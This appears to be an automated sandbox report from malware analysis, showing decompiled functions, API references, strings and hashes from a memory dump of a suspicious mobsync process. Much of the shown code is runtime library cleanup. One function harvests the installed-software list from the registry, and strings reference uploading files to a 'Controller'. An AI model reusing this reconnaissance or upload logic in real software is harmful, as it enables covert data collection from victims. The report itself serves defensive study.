Similarity

API ID: File$CreatePointerReadSize__aulldivclosesocketconnectsend
String ID: ReadFile error$SetFilePointerEx error$Uj@$Uploading file to Controller: $[ERROR]$[Info]
API String ID: 1319223106-4286703352
Opcode ID: ea9dc3382f7ccf715e56e8ea9f2ee8ec3b0c23dd43ab5e62a9051da95a25285a
Instruction ID: 084dee6794f9bc5a8996b457c444aa73e5b6539c698c474e9a2b46c6d08c787a
Opcode Fuzzy Hash: ea9dc3382f7ccf715e56e8ea9f2ee8ec3b0c23dd43ab5e62a9051da95a25285a
Instruction Fuzzy Hash: 9AC16871E00219ABCB04FF65DC829EEB775AF44304F5081BFE406B6291EF385A458B99

Uniqueness

Uniqueness Score: -1.00%

Function 004187B2, Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 74
windowCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E004187B2(void* __ecx, struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				struct tagPOINT _v12;
				void* _t16;
				struct HMENU__* _t17;
				void* _t20;
				void* _t24;

				_t16 = _a8 - 1;
				if(_t16 == 0) {
					_t17 = CreatePopupMenu();
					 *0x46beb8 = _t17;
					AppendMenuA(_t17, 0, 0, "Close");
					L15:
					return 0;
				}
				_t20 = _t16 - 0x110;
				if(_t20 == 0) {
					if(_a12 != 0) {
						goto L15;
					}
					Shell_NotifyIconA(2, 0x46bec0);
					ExitProcess(0);
				}
				if(_t20 == 0x2f0) {
					_t24 = _a16 - 0x201;
					if(_t24 == 0) {
						if(IsWindowVisible( *0x46bebc) == 0) {
							ShowWindow( *0x46bebc, 9);
							SetForegroundWindow( *0x46bebc);
						} else {
							ShowWindow( *0x46bebc, 0);
						}
						goto L15;
					}
					if(_t24 == 3) {
						GetCursorPos( &_v12);
						SetForegroundWindow(_a4);
						TrackPopupMenu( *0x46beb8, 0, _v12, _v12.y, 0, _a4, 0);
						goto L15;
					}
					_push(_a16);
					_push(_a12);
					_push(0x401);
					L7:
					return DefWindowProcA(_a4, ??, ??, ??);
				}
				_push(_a16);
				_push(_a12);
				_push(_a8);
				goto L7;
			}

0x004187ba
0x004187bd
0x0041888e
0x0041889b
0x004188a3
0x004188a9
0x00000000
0x004188a9
0x004187c3
0x004187c8
0x00418877
0x00000000
0x00000000
0x00418880
0x00418888
0x00418888
0x004187d3
0x004187e3
0x004187e8
0x00418845
0x0041885f
0x0041886b
0x00418847
0x0041884f
0x0041884f
0x00000000
0x00418845
0x004187ed
0x0041880c
0x00418815
0x0041882f
0x00000000
0x0041882f
0x004187ef
0x004187f2
0x004187f5
0x004187fa
0x00000000
0x004187fd
0x004187d5
0x004187d8
0x004187db
0x00000000

APIs

DefWindowProcA.USER32(?,00000401,?,?), ref: 004187FD
GetCursorPos.USER32(?), ref: 0041880C
SetForegroundWindow.USER32(?), ref: 00418815
TrackPopupMenu.USER32 ref: 0041882F
Shell_NotifyIconA.SHELL32(00000002,0046BEC0), ref: 00418880
ExitProcess.KERNEL32 ref: 00418888
CreatePopupMenu.USER32 ref: 0041888E
AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 004188A3

Strings

Close, xrefs: 00418894

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
String ID: Close
API String ID: 1657328048-3535843008
Opcode ID: 34bd8b003ed8040b53161cef1e7b838e0dd6a32a7fd2539b020779d52ba0edc8
Instruction ID: 384e4941bdc51aec785ae54d0846d7427833242b9ed721b5f4b9d7b17cf01d93
Opcode Fuzzy Hash: 34bd8b003ed8040b53161cef1e7b838e0dd6a32a7fd2539b020779d52ba0edc8
Instruction Fuzzy Hash: 28216B31104209BFDB096FA4ED0DAAA7B75FB04342F10413EFA16901B1DBB6DAA0DB59

Uniqueness

Uniqueness Score: -1.00%

Function 0043E23C, Relevance: 22.8, APIs: 15, Instructions: 296
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E0043E23C(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr* _a4) {
				signed int _v8;
				char _v21;
				intOrPtr _v22;
				struct _cpinfo _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				intOrPtr* _v44;
				signed int _v48;
				void* _v52;
				signed int* _v56;
				intOrPtr _v60;
				intOrPtr* _v64;
				signed int* _v68;
				void* _v72;
				char _v76;
				signed int _t101;
				signed int _t123;
				signed short _t126;
				void* _t130;
				void* _t134;
				void* _t137;
				void* _t138;
				intOrPtr _t139;
				void* _t141;
				signed int _t142;
				intOrPtr* _t143;
				signed char _t160;
				signed char _t165;
				signed int _t166;
				void* _t168;
				signed int _t170;
				void* _t179;
				signed int* _t180;
				signed int* _t181;
				signed int _t182;
				signed char* _t189;
				signed char* _t190;
				signed int _t192;
				void* _t193;
				intOrPtr _t197;
				short* _t209;
				intOrPtr* _t211;
				intOrPtr* _t215;
				signed int _t216;
				signed int _t217;
				void* _t218;
				void* _t219;

				_t101 =  *0x46a00c; // 0x44c884ad
				_v8 = _t101 ^ _t217;
				_t211 = _a4;
				_t170 = 0;
				_v64 = _t211;
				_v32 = 0;
				_t172 =  *((intOrPtr*)(_t211 + 0xa8));
				_v36 = 0;
				_v40 = 0;
				_v52 = 0;
				_v76 = _t211;
				_v72 = 0;
				if( *((intOrPtr*)(_t211 + 0xa8)) == 0) {
					__eflags =  *(_t211 + 0x8c);
					if( *(_t211 + 0x8c) != 0) {
						asm("lock dec dword [eax]");
					}
					 *(_t211 + 0x8c) = _t170;
					__eflags = 0;
					 *(_t211 + 0x90) = _t170;
					 *_t211 = 0x4577a8;
					 *((intOrPtr*)(_t211 + 0x94)) = 0x457a28;
					 *((intOrPtr*)(_t211 + 0x98)) = 0x457ba8;
					 *((intOrPtr*)(_t211 + 4)) = 1;
					L41:
					return E0042F61B(_v8 ^ _t217);
				}
				_t106 = _t211 + 8;
				_v44 = 0;
				if( *(_t211 + 8) != 0) {
					L3:
					_v44 = L0043DFD9(_t172, 1, 4);
					L0043EE85(_t170);
					_v32 = L0043DFD9(_t172, 0x180, 2);
					L0043EE85(_t170);
					_v36 = L0043DFD9(_t172, 0x180, 1);
					L0043EE85(_t170);
					_v40 = L0043DFD9(_t172, 0x180, 1);
					L0043EE85(_t170);
					_t197 = L0043DFD9(_t172, 0x101, 1);
					_v52 = _t197;
					L0043EE85(_t170);
					_t219 = _t218 + 0x3c;
					if(_v44 == _t170 || _v32 == _t170 || _t197 == 0 || _v36 == _t170 || _v40 == _t170) {
						L36:
						L0043EE85(_v44);
						L0043EE85(_v32);
						L0043EE85(_v36);
						L0043EE85(_v40);
						_t170 = 1;
						__eflags = 1;
						goto L37;
					} else {
						_t123 = _t170;
						do {
							 *(_t123 + _t197) = _t123;
							_t123 = _t123 + 1;
						} while (_t123 < 0x100);
						if(GetCPInfo( *(_t211 + 8),  &_v28) == 0) {
							goto L36;
						}
						_t126 = _v28;
						_t235 = _t126 - 5;
						if(_t126 > 5) {
							goto L36;
						}
						_t28 = _t197 + 1; // 0x1
						_v48 = _t126 & 0x0000ffff;
						_t192 = 0xff;
						_t130 = E0044348A(_t197, _t211, _t235, _t170,  *((intOrPtr*)(_t211 + 0xa8)), 0x100, _t28, 0xff, _v36 + 0x81, 0xff,  *(_t211 + 8), _t170);
						_t219 = _t219 + 0x24;
						_t236 = _t130;
						if(_t130 == 0) {
							goto L36;
						}
						_t34 = _t197 + 1; // 0x1
						_t134 = E0044348A(_t197, _t211, _t236, _t170,  *((intOrPtr*)(_t211 + 0xa8)), 0x200, _t34, 0xff, _v40 + 0x81, 0xff,  *(_t211 + 8), _t170);
						_t219 = _t219 + 0x24;
						if(_t134 == 0) {
							goto L36;
						}
						if(_v48 <= 1 || _v22 == _t170) {
							L22:
							_v60 = _v32 + 0x100;
							_t137 = L00447F5C(_t170, _t192, _t197, _t211, _t242, _t170, 1, _t197, 0x100, _v32 + 0x100,  *(_t211 + 8), _t170);
							_t219 = _t219 + 0x1c;
							if(_t137 == 0) {
								goto L36;
							}
							_t193 = _v32;
							_t138 = _t193 + 0xfe;
							 *_t138 = 0;
							_t179 = _v36;
							_v32 = _t138;
							_t139 = _v40;
							 *(_t179 + 0x7f) = _t170;
							_t180 = _t179 - 0xffffff80;
							 *(_t139 + 0x7f) = _t170;
							_v68 = _t180;
							 *_t180 = _t170;
							_t181 = _t139 + 0x80;
							_v56 = _t181;
							 *_t181 = _t170;
							if(_v48 <= 1 || _v22 == _t170) {
								L32:
								_t182 = 0x3f;
								memcpy(_t193, _t193 + 0x200, _t182 << 2);
								_push(0x1f);
								asm("movsw");
								_t141 = memcpy(_v36, _v36 + 0x100, 0 << 2);
								_push(0x1f);
								asm("movsw");
								asm("movsb");
								_t142 = memcpy(_t141, _t141 + 0x100, 0 << 2);
								asm("movsw");
								asm("movsb");
								_t215 = _v64;
								if( *((intOrPtr*)(_t215 + 0x8c)) != 0) {
									asm("lock xadd [ecx], eax");
									if((_t142 | 0xffffffff) == 0) {
										L0043EE85( *(_t215 + 0x90) - 0xfe);
										L0043EE85( *(_t215 + 0x94) - 0x80);
										L0043EE85( *(_t215 + 0x98) - 0x80);
										L0043EE85( *((intOrPtr*)(_t215 + 0x8c)));
									}
								}
								_t143 = _v44;
								 *_t143 = 1;
								 *((intOrPtr*)(_t215 + 0x8c)) = _t143;
								 *_t215 = _v60;
								 *(_t215 + 0x90) = _v32;
								 *(_t215 + 0x94) = _v68;
								 *(_t215 + 0x98) = _v56;
								 *(_t215 + 4) = _v48;
								L37:
								L0043EE85(_v52);
								goto L41;
							} else {
								_t189 =  &_v21;
								while(1) {
									_t160 =  *_t189;
									if(_t160 == 0) {
										break;
									}
									_t216 =  *(_t189 - 1) & 0x000000ff;
									if(_t216 > (_t160 & 0x000000ff)) {
										L30:
										_t189 =  &(_t189[2]);
										if( *(_t189 - 1) != _t170) {
											continue;
										}
										break;
									}
									_t209 = _t193 + 0x100 + _t216 * 2;
									do {
										_t216 = _t216 + 1;
										 *_t209 = 0x8000;
										_t209 = _t209 + 2;
									} while (_t216 <= ( *_t189 & 0x000000ff));
									goto L30;
								}
								goto L32;
							}
						} else {
							_t190 =  &_v21;
							while(1) {
								_t165 =  *_t190;
								if(_t165 == 0) {
									goto L22;
								}
								_t192 =  *(_t190 - 1) & 0x000000ff;
								_t166 = _t165 & 0x000000ff;
								while(_t192 <= _t166) {
									 *((char*)(_t192 + _t197)) = 0x20;
									_t192 = _t192 + 1;
									__eflags = _t192;
									_t166 =  *_t190 & 0x000000ff;
								}
								_t190 =  &(_t190[2]);
								_t242 =  *(_t190 - 1) - _t170;
								if( *(_t190 - 1) != _t170) {
									continue;
								}
								goto L22;
							}
							goto L22;
						}
					}
				}
				_t168 = E0044A26E(0, __edx, __edi, _t211,  &_v76, 0, _t172, 0x1004, _t106);
				_t219 = _t218 + 0x14;
				if(_t168 != 0) {
					goto L36;
				}
				goto L3;
			}

0x0043e244
0x0043e24b
0x0043e250
0x0043e253
0x0043e256
0x0043e259
0x0043e25c
0x0043e262
0x0043e265
0x0043e268
0x0043e26b
0x0043e26e
0x0043e273
0x0043e593
0x0043e595
0x0043e597
0x0043e597
0x0043e59a
0x0043e5a0
0x0043e5a2
0x0043e5a8
0x0043e5ae
0x0043e5b8
0x0043e5c2
0x0043e5c9
0x0043e5d9
0x0043e5d9
0x0043e279
0x0043e27c
0x0043e281
0x0043e29f
0x0043e2a9
0x0043e2ac
0x0043e2bf
0x0043e2c2
0x0043e2d0
0x0043e2d3
0x0043e2e1
0x0043e2e4
0x0043e2f5
0x0043e2f8
0x0043e2fb
0x0043e300
0x0043e306
0x0043e55a
0x0043e55d
0x0043e565
0x0043e56d
0x0043e575
0x0043e57f
0x0043e57f
0x00000000
0x0043e32f
0x0043e32f
0x0043e331
0x0043e331
0x0043e334
0x0043e335
0x0043e34b
0x00000000
0x00000000
0x0043e351
0x0043e354
0x0043e357
0x00000000
0x00000000
0x0043e364
0x0043e367
0x0043e36a
0x0043e387
0x0043e38c
0x0043e38f
0x0043e391
0x00000000
0x00000000
0x0043e3ab
0x0043e3bb
0x0043e3c0
0x0043e3c5
0x00000000
0x00000000
0x0043e3cf
0x0043e3fc
0x0043e412
0x0043e415
0x0043e41a
0x0043e41f
0x00000000
0x00000000
0x0043e425
0x0043e42a
0x0043e430
0x0043e433
0x0043e436
0x0043e439
0x0043e43c
0x0043e43f
0x0043e446
0x0043e449
0x0043e44c
0x0043e44e
0x0043e454
0x0043e457
0x0043e459
0x0043e49b
0x0043e49d
0x0043e4a6
0x0043e4ab
0x0043e4ae
0x0043e4b8
0x0043e4ba
0x0043e4bd
0x0043e4bf
0x0043e4c8
0x0043e4ca
0x0043e4cc
0x0043e4cd
0x0043e4d8
0x0043e4dd
0x0043e4e1
0x0043e4ef
0x0043e502
0x0043e510
0x0043e51b
0x0043e520
0x0043e4e1
0x0043e523
0x0043e526
0x0043e52c
0x0043e535
0x0043e53a
0x0043e543
0x0043e54c
0x0043e555
0x0043e580
0x0043e583
0x00000000
0x0043e460
0x0043e460
0x0043e463
0x0043e463
0x0043e467
0x00000000
0x00000000
0x0043e469
0x0043e472
0x0043e490
0x0043e490
0x0043e496
0x00000000
0x00000000
0x00000000
0x0043e496
0x0043e47a
0x0043e47d
0x0043e482
0x0043e483
0x0043e486
0x0043e48c
0x00000000
0x0043e47d
0x00000000
0x0043e498
0x0043e3d6
0x0043e3d6
0x0043e3d9
0x0043e3d9
0x0043e3dd
0x00000000
0x00000000
0x0043e3df
0x0043e3e3
0x0043e3f0
0x0043e3e8
0x0043e3ec
0x0043e3ec
0x0043e3ed
0x0043e3ed
0x0043e3f4
0x0043e3f7
0x0043e3fa
0x00000000
0x00000000
0x00000000
0x0043e3fa
0x00000000
0x0043e3d9
0x0043e3cf
0x0043e306
0x0043e28f
0x0043e294
0x0043e299
0x00000000
0x00000000
0x00000000

APIs

_free.LIBCMT ref: 0043E2AC
_free.LIBCMT ref: 0043E2C2
_free.LIBCMT ref: 0043E2D3
_free.LIBCMT ref: 0043E2E4
_free.LIBCMT ref: 0043E2FB
GetCPInfo.KERNEL32(?,?), ref: 0043E343

Part of subcall function 0044A26E: _free.LIBCMT ref: 0044A2D9

_free.LIBCMT ref: 0043E4EF
_free.LIBCMT ref: 0043E502
_free.LIBCMT ref: 0043E510
_free.LIBCMT ref: 0043E51B
_free.LIBCMT ref: 0043E55D
_free.LIBCMT ref: 0043E565
_free.LIBCMT ref: 0043E56D
_free.LIBCMT ref: 0043E575
_free.LIBCMT ref: 0043E583

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: fca23b915922a1d6a493f4f724e80eb8bc58a3daeca01358566e9a6e63a64209
Instruction ID: 6b2bdcf8ba42ba7e642015036dc949e4624d86c0fc26f2591f5c67e68ea4a483
Opcode Fuzzy Hash: fca23b915922a1d6a493f4f724e80eb8bc58a3daeca01358566e9a6e63a64209
Instruction Fuzzy Hash: 42B19F71901205AEDB11DFAAC881BEEBBF4FF0C304F14516EF855A7282DA79A845CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0041755D, Relevance: 21.2, APIs: 5, Strings: 7, Instructions: 212
registryCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E0041755D(void* __ebx, void* __ecx) {
				void* _v8;
				void* _v12;
				char _v16;
				char _v40;
				char _v64;
				char _v88;
				char _v112;
				char _v136;
				char _v160;
				char _v184;
				char _v208;
				char _v232;
				char _v256;
				char _v280;
				char _v304;
				char _v328;
				char _v352;
				char _v376;
				char _v400;
				char _v424;
				char _v448;
				char _v472;
				char _v1500;
				void* __edi;
				long _t72;
				long _t78;
				long _t206;
				void* _t207;
				intOrPtr* _t208;

				_t129 = __ebx;
				_t207 = __ecx;
				if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall", 0, 0x20019,  &_v12) == 0) {
					_v16 = 0x400;
					_t206 = 0;
					L00401F4D(__ebx,  &_v64);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push( &_v16);
					_push( &_v1500);
					_push(0);
					while(1) {
						_t72 = RegEnumKeyExA(_v12, ??, ??, ??, ??, ??, ??, ??);
						__eflags = _t72 - 0x103;
						if(__eflags == 0) {
							break;
						}
						__eflags = _t72;
						if(_t72 != 0) {
							L8:
							_t206 = _t206 + 1;
							__eflags = _t206;
							_v16 = 0x400;
						} else {
							_t78 = RegOpenKeyExA(_v12,  &_v1500, 0, 0x20019,  &_v8);
							__eflags = _t78;
							if(_t78 == 0) {
								E004103AF( &_v40, _v8, L"DisplayName");
								 *_t208 = L"Publisher";
								E004103AF( &_v184, _v8);
								 *_t208 = L"DisplayVersion";
								E004103AF( &_v160, _v8);
								 *_t208 = L"InstallLocation";
								E004103AF( &_v136, _v8);
								 *_t208 = L"InstallDate";
								E004103AF( &_v112, _v8);
								 *_t208 = L"UninstallString";
								E004103AF( &_v88, _v8);
								__eflags = L00409DB7();
								if(__eflags == 0) {
									E004032F1(E00403086(_t129,  &_v208, E00403086(_t129,  &_v232, E00404409(_t129,  &_v256, E00403086(_t129,  &_v280, E00404409(_t129,  &_v304, E00403086(_t129,  &_v328, E00404409(_t129,  &_v352, E00403086(_t129,  &_v376, E00404409(_t129,  &_v400, E00403086(_t129,  &_v424, E00404409(_t129,  &_v448, E00407516( &_v472,  &_v40, __eflags, 0x4659b4), __eflags,  &_v160), _t206, __eflags, 0x4659b4), __eflags,  &_v112), _t206, __eflags, 0x4659b4), __eflags,  &_v184), _t206, __eflags, 0x4659b4), __eflags,  &_v136), _t206, __eflags, 0x4659b4), __eflags,  &_v88), _t206, __eflags, 0x4659b4), _t206, __eflags, "\n"));
									L00401ED0();
									L00401ED0();
									L00401ED0();
									L00401ED0();
									L00401ED0();
									L00401ED0();
									L00401ED0();
									L00401ED0();
									L00401ED0();
									L00401ED0();
									L00401ED0();
									L00401ED0();
								}
								RegCloseKey(_v8);
								L00401ED0();
								L00401ED0();
								L00401ED0();
								L00401ED0();
								L00401ED0();
								L00401ED0();
								goto L8;
							}
						}
						__eflags = 0;
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push( &_v16);
						_push( &_v1500);
						_push(_t206);
					}
					RegCloseKey(_v12);
					E004032FA(_t129, _t207, __eflags,  &_v64);
					L00401ED0();
				} else {
					E0040425F(__ebx, _t207,  &E0045F714);
				}
				return _t207;
			}

0x0041755d
0x0041757d
0x00417587
0x0041759d
0x004175a4
0x004175a6
0x004175b0
0x004175b1
0x004175b2
0x004175b3
0x004175b4
0x004175bb
0x004175bc
0x00417830
0x00417833
0x00417839
0x0041783e
0x00000000
0x00000000
0x004175c2
0x004175c4
0x00417816
0x00417816
0x00417816
0x00417817
0x004175ca
0x004175df
0x004175e5
0x004175e7
0x004175f8
0x00417606
0x0041760d
0x0041761b
0x00417622
0x00417630
0x00417637
0x00417642
0x00417649
0x00417654
0x0041765b
0x00417669
0x0041766b
0x0041774b
0x00417756
0x00417761
0x0041776c
0x00417777
0x00417782
0x0041778d
0x00417798
0x004177a3
0x004177ae
0x004177b9
0x004177c4
0x004177cf
0x004177cf
0x004177d7
0x004177e0
0x004177e8
0x004177f3
0x004177fe
0x00417809
0x00417811
0x00000000
0x00417811
0x004175e7
0x0041781e
0x00417820
0x00417821
0x00417822
0x00417823
0x00417827
0x0041782e
0x0041782f
0x0041782f
0x00417847
0x00417853
0x0041785b
0x00417589
0x00417590
0x00417590
0x00417867

APIs

RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041757F
RegEnumKeyExA.ADVAPI32(?,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00417833
RegCloseKey.ADVAPI32(?), ref: 00417847

Strings

Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00417573
DisplayName, xrefs: 004175F3
UninstallString, xrefs: 00417654
Publisher, xrefs: 00417606
InstallLocation, xrefs: 00417630
DisplayVersion, xrefs: 0041761B
InstallDate, xrefs: 00417642

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
API String ID: 1332880857-3714951968
Opcode ID: 31def876107ac4269bf59ae2227aaa5c4ce6327fab85146a287457b6080f8ee1
Instruction ID: 918c60c30167cdbca0fafa00f68e4c19a9dd40daefd47028054c4c048a220fb3
Opcode Fuzzy Hash: 31def876107ac4269bf59ae2227aaa5c4ce6327fab85146a287457b6080f8ee1
Instruction Fuzzy Hash: B9813F719101089BDB14EB62DC52AEEB379EF54305F1041AFB50AB21D1EF346F85CA69

Uniqueness

Uniqueness Score: -1.00%

Function 004480F6, Relevance: 19.6, APIs: 13, Instructions: 114
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E004480F6(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x46a188) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							L0043EE85(_t46);
							E00447332( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							L0043EE85(_t47);
							E004477EC( *((intOrPtr*)(_t74 + 0x88)));
						}
						L0043EE85( *((intOrPtr*)(_t74 + 0x7c)));
						L0043EE85( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					L0043EE85( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					L0043EE85( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					L0043EE85( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					L0043EE85( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E00448269( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t16 = _t74 + 0xa0; // 0xa0
				_t55 = _t16;
				_v8 = _t28;
				_t18 = _t74 + 0x28; // 0x28
				_t70 = _t18;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x46a2a8) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							L0043EE85(_t31);
							L0043EE85( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							L0043EE85(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return L0043EE85(_t74);
			}

0x004480fe
0x00448102
0x0044810a
0x00448113
0x00448118
0x0044811f
0x00448127
0x0044812f
0x0044813a
0x00448140
0x00448141
0x00448149
0x00448151
0x0044815c
0x00448162
0x00448166
0x00448171
0x00448177
0x00448118
0x00448178
0x00448180
0x00448193
0x004481a6
0x004481b4
0x004481bf
0x004481c4
0x004481cd
0x004481d5
0x004481d6
0x004481d6
0x004481dc
0x004481df
0x004481df
0x004481e2
0x004481e9
0x004481eb
0x004481ef
0x004481f7
0x004481fe
0x00448204
0x00448205
0x00448205
0x0044820c
0x0044820e
0x00448213
0x0044821b
0x00448220
0x00448221
0x00448221
0x00448224
0x00448227
0x0044822a
0x0044822d
0x0044822d
0x0044823f

APIs

___free_lconv_mon.LIBCMT ref: 0044813A

Part of subcall function 00447332: _free.LIBCMT ref: 0044734F
Part of subcall function 00447332: _free.LIBCMT ref: 00447361
Part of subcall function 00447332: _free.LIBCMT ref: 00447373
Part of subcall function 00447332: _free.LIBCMT ref: 00447385
Part of subcall function 00447332: _free.LIBCMT ref: 00447397
Part of subcall function 00447332: _free.LIBCMT ref: 004473A9
Part of subcall function 00447332: _free.LIBCMT ref: 004473BB
Part of subcall function 00447332: _free.LIBCMT ref: 004473CD
Part of subcall function 00447332: _free.LIBCMT ref: 004473DF
Part of subcall function 00447332: _free.LIBCMT ref: 004473F1
Part of subcall function 00447332: _free.LIBCMT ref: 00447403
Part of subcall function 00447332: _free.LIBCMT ref: 00447415
Part of subcall function 00447332: _free.LIBCMT ref: 00447427

_free.LIBCMT ref: 0044812F

Part of subcall function 0043EE85: HeapFree.KERNEL32(00000000,00000000,?,00447A9F,00000000,00000000,00000000,00000000,?,00447D43,00000000,00000007,00000000,?,0044828E,00000000), ref: 0043EE9B
Part of subcall function 0043EE85: GetLastError.KERNEL32(00000000,?,00447A9F,00000000,00000000,00000000,00000000,?,00447D43,00000000,00000007,00000000,?,0044828E,00000000,00000000), ref: 0043EEAD

_free.LIBCMT ref: 00448151
_free.LIBCMT ref: 00448166
_free.LIBCMT ref: 00448171
_free.LIBCMT ref: 00448193
_free.LIBCMT ref: 004481A6
_free.LIBCMT ref: 004481B4
_free.LIBCMT ref: 004481BF
_free.LIBCMT ref: 004481F7
_free.LIBCMT ref: 004481FE
_free.LIBCMT ref: 0044821B
_free.LIBCMT ref: 00448233

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 8b17bf4bcecabb647019a779e3dd08f50c7c3410c3c01fd7615392e0bfe9a2e3
Instruction ID: a56d3d2c39c59f1f27121bff60bdf2851450fdc6f924b8cf5ee19873ea009e99
Opcode Fuzzy Hash: 8b17bf4bcecabb647019a779e3dd08f50c7c3410c3c01fd7615392e0bfe9a2e3
Instruction Fuzzy Hash: 1F318B316007019FEF20AA7AD846B5BB3E8EF45754F10495FE068E7291DF78AC46CB18

Uniqueness

Uniqueness Score: -1.00%

Function 00447430, Relevance: 18.4, APIs: 12, Instructions: 376
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E00447430(void* __edx, char _a4) {
				void* _v8;
				void* _v12;
				signed int _v16;
				intOrPtr* _v20;
				signed int _v24;
				char _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t105;
				char _t195;
				char _t210;
				signed int _t213;
				void* _t224;
				char* _t226;
				signed int _t227;
				signed int _t231;
				signed int _t232;
				void* _t234;
				void* _t236;
				signed int _t237;
				signed int _t238;
				signed int _t239;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t246;
				signed int _t247;
				signed int _t248;
				signed int _t249;
				signed int _t250;
				signed int _t251;
				signed int _t252;
				signed int _t253;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				char* _t257;

				_t224 = __edx;
				_t210 = _a4;
				_v16 = 0;
				_v28 = _t210;
				_v24 = 0;
				if( *((intOrPtr*)(_t210 + 0xac)) != 0 ||  *((intOrPtr*)(_t210 + 0xb0)) != 0) {
					_t234 = L0043DFD9(0, 1, 0x50);
					_v8 = _t234;
					L0043EE85(0);
					if(_t234 != 0) {
						_t227 = L0043DFD9(0, 1, 4);
						_v12 = _t227;
						L0043EE85(0);
						if(_t227 != 0) {
							if( *((intOrPtr*)(_t210 + 0xac)) == 0) {
								_t213 = 0x14;
								memcpy(_v8, 0x46a188, _t213 << 2);
								L25:
								_t236 = _v8;
								_t231 = _v16;
								 *_t236 =  *( *(_t210 + 0x88));
								 *((intOrPtr*)(_t236 + 4)) =  *((intOrPtr*)( *(_t210 + 0x88) + 4));
								 *((intOrPtr*)(_t236 + 8)) =  *((intOrPtr*)( *(_t210 + 0x88) + 8));
								 *((intOrPtr*)(_t236 + 0x30)) =  *((intOrPtr*)( *(_t210 + 0x88) + 0x30));
								 *((intOrPtr*)(_t236 + 0x34)) =  *((intOrPtr*)( *(_t210 + 0x88) + 0x34));
								 *_v12 = 1;
								if(_t231 != 0) {
									 *_t231 = 1;
								}
								goto L27;
							}
							_t232 = L0043DFD9(0, 1, 4);
							_v16 = _t232;
							L0043EE85(0);
							if(_t232 != 0) {
								_t233 =  *((intOrPtr*)(_t210 + 0xac));
								_t14 = _t234 + 0xc; // 0xc
